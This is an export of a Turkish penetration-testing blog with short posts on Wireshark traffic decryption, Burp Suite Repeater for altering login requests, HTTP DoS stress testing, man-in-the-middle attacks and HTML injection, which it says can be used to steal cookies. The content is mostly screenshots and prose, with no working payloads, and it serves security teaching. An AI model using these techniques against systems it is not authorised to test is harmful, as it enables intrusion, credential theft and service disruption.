<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">"New" sekmesi ile ;</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbHW81zpWpRDMxHIwvMhac3EghbvUaSIWe-LulCnl_MNFgFTEd-5uZVvDxATe5HOLchMJod-hCI-sQZCAbhtV-KjTczz7nYnMpRtJuhNFw-0ED5J6jK77Sm9mfnV-keAMifZsfCvBEV_Q/s1600/wi6.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbHW81zpWpRDMxHIwvMhac3EghbvUaSIWe-LulCnl_MNFgFTEd-5uZVvDxATe5HOLchMJod-hCI-sQZCAbhtV-KjTczz7nYnMpRtJuhNFw-0ED5J6jK77Sm9mfnV-keAMifZsfCvBEV_Q/s1600/wi6.PNG" /></a></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">IP,port,protokol ve key in bulunduğu yeri göstermemiz gerekiyor. OK ve Apply dedikten sonra wireshark üzerinde şifrelenmiş veri açılacaktır.Sonucu görelim</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG2HzuaLV-0Nzigjzfyjv4DLqw1cKEJdsSzICCSHPmxEf18wZ4Qa5cXB0kfNTJbj68KkVLJFE2MpvLEN37HdeA6ZSn8k1BYZvk-vzc3ue3bit-RRGGQfastxvAblIXcVHHh8BR0gRMvpE/s1600/wi7.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG2HzuaLV-0Nzigjzfyjv4DLqw1cKEJdsSzICCSHPmxEf18wZ4Qa5cXB0kfNTJbj68KkVLJFE2MpvLEN37HdeA6ZSn8k1BYZvk-vzc3ue3bit-RRGGQfastxvAblIXcVHHh8BR0gRMvpE/s1600/wi7.PNG" height="141" width="400" /></a></div>
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">"File-->Export Objects-->HTTP" dediğimizde de trafikteki verileri görürüz. "Save As" veya "Save All" ile de istediğimiz alana kaydedebiliriz.</span></span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0_j-BwjfUqykfHa7blfmWNZ1zqTP2Wpl5N0Weoh6Mjhy4s3jWMphyphenhyphenGj_GWyPBFWoFEBgvxzP6XsqtUzOqztCJ87m7o-qpH9Hte_jOUqLz0FoYy_KMabjwswnA5q1OKCpLFG5bRii27i8/s1600/wi8.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0_j-BwjfUqykfHa7blfmWNZ1zqTP2Wpl5N0Weoh6Mjhy4s3jWMphyphenhyphenGj_GWyPBFWoFEBgvxzP6XsqtUzOqztCJ87m7o-qpH9Hte_jOUqLz0FoYy_KMabjwswnA5q1OKCpLFG5bRii27i8/s1600/wi8.PNG" height="183" width="400" /></a></div>
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-86311097187242851892014-10-23T11:06:00.001+03:002014-10-23T11:07:40.401+03:00Siber Suç artık Mobil Cihazlarda<iframe allowfullscreen="" frameborder="0" height="350" src="https://www.youtube.com/embed/UtxeRDTqQTs" width="650"></iframe>Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-76016327855949280872014-10-22T12:33:00.000+03:002014-10-22T12:36:10.531+03:00Web Pentest İşlemlerinde Burp Suite Kullanımı-3 - (Repeater Kullanımı)<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;">Burp Suite proxy aracının <strong>"Repeater"</strong> özelliğini kullanacağız.Repeater özelliği,pentest yapılacak uygulama üzerinde giden gelen veriler,parametreler ve uygulamanın kodları üzerinde daha kolay ve hızlı çalışmamızı sağlayan bir özelliktir.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;">Burp suite ile ilk isteği yakaladıktan sonra yakalanan alanın üzerine sağ tıklanıp <strong>"Send to Repeater"</strong> dediğimizde üst menüdeki <strong>"Repeater"</strong> özelliği aktif olacaktır.Repeater özelliğine tıkladığımızda giden isteğin kodları karşımıza geliyor.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0qyl9MYp_mffoV43W1KphS9J11dRAxEAfCeaVNk13JWF4O82_F7Z9iz0CBm39Ve1-3IMvBVZwoaeBzM3PnW5mSC3-0n9-RN4HYD4b1kDfoU99wVXHGBaKhglC0lLLYh9NoOR-uy7nSTk/s1600/1.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0qyl9MYp_mffoV43W1KphS9J11dRAxEAfCeaVNk13JWF4O82_F7Z9iz0CBm39Ve1-3IMvBVZwoaeBzM3PnW5mSC3-0n9-RN4HYD4b1kDfoU99wVXHGBaKhglC0lLLYh9NoOR-uy7nSTk/s1600/1.png" height="97" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;">Gelen isteğin sunucuya ulaştırmak için <strong>"Go"</strong> butonuna tıklıyoruz.</span><br />
<a name='more'></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBXLRIFxJv2wOrssC-U9lkLXL4Tyu_aRQneHRvQgXCvIW1iEZ1TT8bz-lnwT1dUBU4dNdJQcyAbLuQQnnXKZoZQIrv5qu78ORLc138BNAacrFr5igOO1fkpxAZkoPwJT3e7KTmqm8faA/s1600/iki.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBXLRIFxJv2wOrssC-U9lkLXL4Tyu_aRQneHRvQgXCvIW1iEZ1TT8bz-lnwT1dUBU4dNdJQcyAbLuQQnnXKZoZQIrv5qu78ORLc138BNAacrFr5igOO1fkpxAZkoPwJT3e7KTmqm8faA/s1600/iki.png" height="250" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Sunucu bize cevap dönüyor. </span><strong style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">"Follow redirection"</strong><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> butonuna tıklayarak isteğin html çıktısını görüyor.Böylece isteğin başarılı olup olmadığını buradan görebiliyoruz.</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj40bgBVkXh5rw5PibLYdqXFvbB-w5XjCxM9rKhyphenhyphenIdsR5wjBGorb8am_01j9E5yK1whBZVIP9PQdRJ-pPEp66zPuNR6jP4Tkh-8qLqbKQnWppd2cvXdlHeeCitsUrkkDDksOo4Y9Agko64/s1600/dort.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj40bgBVkXh5rw5PibLYdqXFvbB-w5XjCxM9rKhyphenhyphenIdsR5wjBGorb8am_01j9E5yK1whBZVIP9PQdRJ-pPEp66zPuNR6jP4Tkh-8qLqbKQnWppd2cvXdlHeeCitsUrkkDDksOo4Y9Agko64/s1600/dort.png" height="212" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Parametreleri </span><strong style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">admin=admin&password=password</strong><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> olarak değiştirelim ve sonucu görelim.</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwgkg1iGvlZuWWwfgSejO-aEts8nFSbhMP-9k2KG-GR1IYkjuuFi8fRdA9hmZVBYjfAxjcipU3VX1-dQk9wc8SMptMwxn7TsYGtmFuRcRADP8iCj7bkkSvrKzfhgyh8drg3EQgcEFnugc/s1600/yedi.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwgkg1iGvlZuWWwfgSejO-aEts8nFSbhMP-9k2KG-GR1IYkjuuFi8fRdA9hmZVBYjfAxjcipU3VX1-dQk9wc8SMptMwxn7TsYGtmFuRcRADP8iCj7bkkSvrKzfhgyh8drg3EQgcEFnugc/s1600/yedi.png" height="218" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Böylece repeater ile pentest işlemlerini daha hızlı gerçekleştiririz.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-17126702394704733172014-10-21T16:42:00.001+03:002014-10-21T16:54:24.106+03:00HTTP DOS Saldırısının Test Edilmesi<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bir web sitesi tasarladık,kodladık ve yayına hazır hale getirdik. Bu siteyi herhangi bir teste tabi tutmadan direkt yayına açmak olası onlarca saldırıyı göze aldığımız anlamına gelir. Site tasarlarken,kodlarken,sistem tasarımını dizayn ederken mutlaka saldırıları göz önünde bulundurarak gerçekleştirmek zorundayız. Bizim için ufak görünen ama saldırgan için açık kapı sayılan detaylar site için verilene emeğin boşa gitmesini sağlar.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Peki siteyi sağlam şekilde kodladık ve bir nevi pentest işlemlerine tabi tuttuk ve sonuçta ciddi risk oluşturacak tüm kapıları kapattık. Bundan sonra siteyi yayına açtık. Yayın hayatına başlayan sitenin web trafiği ziyaretçi sayısına göre değerlendirilir. Siteyi günün belirli saatlerinde ,dakikalarında,saniyelerinde ya da daha kısa sürelerinde görüntülemek isteyen ziyaretçiler vardır.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Bir ziyaretçi ile on,yüz,bin,milyon ziyaretçi arasında nasıl bir fark vardır?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
On saniye içinde bin trafik hacmi veya bir dakika içinde yüzbin trafik alan siteler bu kadar isteği nasıl karşılıyor?<br />
<a name='more'></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bu soruların cevabı "siteyi yayın hayatına başlatırken hiç stress testine tabi tutuyormuyuz?" sorusunun cevabında gizlidir.<br />
<br />
Konuyu toparlayalım.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Web siteleri client-server mimari üzerinde çalışırlar. Bu mimariye göre client tarafındn talep edilen her istek sunucuya(server) gönderilir. Sunucu kendisinde mevcut ve sabit olan istek kuyruk alanı sayısınca cevap vermek zorundadır. Her istek birbirinden bağımsız olabileceği gibi tüm isteklerinde aynı olması mümkündür. Talep edilen sayfanın boyutu,bunun server da oluşturacağı CPU,network trafiği vb. değerleri isteklerin karşılanmasında önemli parametrelerdir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Dolayısıyla yayına başlatacağımız siteleri stres testine tabi tutmak HTTP DOS saldırının olası sonuçlarını test etmeyi sağlar. Bir siteye farklı adreslerden talep edilen isteklerin sayısı siteyi barındıran sunucuların kaldıramayacağı kadar ise bu normal şartlarda bile olsa DOS saldırı anlamına veya eşdeğeri sonuç üretmesine neden olur.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Durumu birde saldırı endeksli düşünelim. Bir,iki veya bir düzine IP bloğundan gelen isteklerin sayısı ile süre parametlerini değerlendirdiğimizde elimizde zamana göre istek sayısı çıkar.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
5 sn içinde 100 istek veya 1 sn içinde 1000 istek şeklinde....</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Saldırı amacı taşıyan bu istekler HTTP DOS saldırısının oluşmaya başladığını gösterebilir. Peki aynı IP den gelen bu çoklu isteklere karşı nasıl bir önlem almak gerekiyor.Her istek normal kullanıcıdan normal bir bir sayfayı talep etme şeklinde gerçekleşmeyebilir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Aynı IP adresinden gelen bu kadar istek için belirli süre içinde ancak belirli sayıda istek talep edilebilir diye kural oluşturulabilinir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Login ekranında brute-force atak deneyen saldırgan saniyede yüzlerce istek gönderebilir. Bu durumda sitenin cevap verme durumu ciddi manada etkilenir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUbbPQogkpbNYywFpOAuO1019BXzMYYpEyDdtirITUX8kpavRWkgFunHdjcgLKILJwNVnOVhV4vcdjkV3MLGstyrJItEQ3S9dbkd6nDn1KoiWtSrTliMpIYq5b9nTGyerjfxDxjVwkNNs/s1600/intruder-6-1024x576.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUbbPQogkpbNYywFpOAuO1019BXzMYYpEyDdtirITUX8kpavRWkgFunHdjcgLKILJwNVnOVhV4vcdjkV3MLGstyrJItEQ3S9dbkd6nDn1KoiWtSrTliMpIYq5b9nTGyerjfxDxjVwkNNs/s1600/intruder-6-1024x576.png" height="225" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Bu gibi durumlarda belli süre veya belli sayıda istek karşılandığında CAPTCHA gösterilip ziyaretçi kontrolü yapılabilinir.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Aşağıda web sitesi için stres testi yapan bir tool mevcut. Kullanımı aşağıdaki gibidir.Free Trial için....</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Adres: <a data-mce-href="http://www.paessler.com/webstress" href="http://www.paessler.com/webstress">http://www.paessler.com/webstress</a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu4BiEi-2yCq-0_5VxROc1D3SqIAbU2tIN24CMhu0p-loXJo2tJqcBpZKXCrZ7VSqzC8UyJvhejj6srGYe5nJ-g3ojG1VZ2JZ0fIgbk8owLurRSXGY8hyphenhyphendZf2nDDFh246J73mtKZZPADA/s1600/H1-1024x503.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu4BiEi-2yCq-0_5VxROc1D3SqIAbU2tIN24CMhu0p-loXJo2tJqcBpZKXCrZ7VSqzC8UyJvhejj6srGYe5nJ-g3ojG1VZ2JZ0fIgbk8owLurRSXGY8hyphenhyphendZf2nDDFh246J73mtKZZPADA/s1600/H1-1024x503.png" height="196" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Test edilecek sitenin adresi için...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimtelpUFNpmjA1V8BJG-N521PEl1qsPbA9tczG_1tPr6fOWAIH798fhYr3UqSObE5atzjKBXTVhOtO2sg7ddw8duWezA7IsqN8CropjM2psIvDSX6MmJT_-Zw5V1WtCOy7s2pWkqDsPWs/s1600/H2-1024x292.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimtelpUFNpmjA1V8BJG-N521PEl1qsPbA9tczG_1tPr6fOWAIH798fhYr3UqSObE5atzjKBXTVhOtO2sg7ddw8duWezA7IsqN8CropjM2psIvDSX6MmJT_-Zw5V1WtCOy7s2pWkqDsPWs/s1600/H2-1024x292.png" height="113" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Stres testini başlatalım</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkN9PNhey2YVpymTSYo1ATEwgB5Pg227uv_iLhCZtJ0m2KG97yz1ttdECa5k0Qse3SMCePmiUQ8cc36xa1ZEvyuiO7tvnHVoKjm6iDN3vjmw2qo4PzOFQAzu6lZ_YlWj9K4V0r2ZrfzgM/s1600/H3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkN9PNhey2YVpymTSYo1ATEwgB5Pg227uv_iLhCZtJ0m2KG97yz1ttdECa5k0Qse3SMCePmiUQ8cc36xa1ZEvyuiO7tvnHVoKjm6iDN3vjmw2qo4PzOFQAzu6lZ_YlWj9K4V0r2ZrfzgM/s1600/H3.png" height="53" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Test ederken giden isteklerin görünümü...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy0bXFTWJEvj2y2CiaGnEAFTX7e7rnfSBRuQYfg85UttDAuaD5jU10EtTlhqVDSvn7l3kO4A8mXX8Ha7dB4xgHJ_ztQ2L6fx6HoSnLYzFjRPTxo-RM2rk3ldDR9q7xJl_HORQ4QeFSHp8/s1600/H6-1024x248.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy0bXFTWJEvj2y2CiaGnEAFTX7e7rnfSBRuQYfg85UttDAuaD5jU10EtTlhqVDSvn7l3kO4A8mXX8Ha7dB4xgHJ_ztQ2L6fx6HoSnLYzFjRPTxo-RM2rk3ldDR9q7xJl_HORQ4QeFSHp8/s1600/H6-1024x248.png" height="96" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Sitenin bulunduğu sunucun normaldeki network ve CPU değerleri...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6oKqr76xeQldnFtcq-vhb7BjAD7P0OajH1-SIydTh-jJS_1JZIfYScELHjSYvtwUR0e5r0P975ZMaiuQ8tOlBJYV3c5rBWoqQcbON-xIRSqzYK5B-TqMzED0EtCxAWQYetkWK_bch0Sg/s1600/H4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6oKqr76xeQldnFtcq-vhb7BjAD7P0OajH1-SIydTh-jJS_1JZIfYScELHjSYvtwUR0e5r0P975ZMaiuQ8tOlBJYV3c5rBWoqQcbON-xIRSqzYK5B-TqMzED0EtCxAWQYetkWK_bch0Sg/s1600/H4.png" height="183" width="320" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Stres testine tabi tutulurkenki değerler....</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1emQSGgiaQfdp1_EjH-TElqQs_jwYGUi39VKa_Z9fDmuksICFh1p38OpM23NUCCACUZAeA36w9jJ3K7_4c-CbvIxT6H_CxeRzM4ox8wGV83QjgsMA8nJh9hPVdReHOZdbp_9UWqchFlQ/s1600/H5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1emQSGgiaQfdp1_EjH-TElqQs_jwYGUi39VKa_Z9fDmuksICFh1p38OpM23NUCCACUZAeA36w9jJ3K7_4c-CbvIxT6H_CxeRzM4ox8wGV83QjgsMA8nJh9hPVdReHOZdbp_9UWqchFlQ/s1600/H5.png" height="184" width="320" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6JieW1otS9vPSOF7GtfBwy1GgYy_B630cqGJlB4f02gL8ZwSN0QikVIRUZUijQFx2-gr2Rtf_5SiaxvFV8ViBpFWetJS8LmYXQsZ080bJ8Frfn8r_GYR_64IEusAr8nNjB8aVQaImu4/s1600/H7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6JieW1otS9vPSOF7GtfBwy1GgYy_B630cqGJlB4f02gL8ZwSN0QikVIRUZUijQFx2-gr2Rtf_5SiaxvFV8ViBpFWetJS8LmYXQsZ080bJ8Frfn8r_GYR_64IEusAr8nNjB8aVQaImu4/s1600/H7.png" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Görüldüğü gibi CPU ve network trafiği ciddi manada artmış durumda.Siteler için mutlaka stres testi yapıp HTTP DOS atağı veya eşdeğeri sonuç üreten durumlar için önlem almak gerekiyor.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-49840942742870598632014-10-10T11:30:00.001+03:002014-12-05T10:06:24.119+02:00Man in the Middle Attack Bu videoda <b>man in the middle</b> saldırısının nasıl gerçekleştirildiği ve araya girme saldırısı sonucunda network yapısı wireshark kullanılarak incelendi.<br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="350" src="https://www.youtube.com/embed/rBdvphkoTDc" width="650"></iframe>Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-28427563459697995212014-10-10T10:01:00.001+03:002014-10-10T13:35:35.202+03:00Yorum Ekleme Alanına Html İnjection SaldırısıHtml Injection açıklığı, web sitelerinde kullanıcılara yorum içerisinde html kod parçaları girmelerini sağlayan input alanlarından kaynaklanır.Bu alanlar ne kadar masum olsa da saldırganlar için çok önemlidir. Bu alanlara saldırı yapısına göre çok farklı html kodları eklenerek üyelerin,ziyaretçilerin bilgileri temin edilebilinir.Bunların başında ziyaretçilerin,üyelerin cookie bilgileri çalınabilir.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
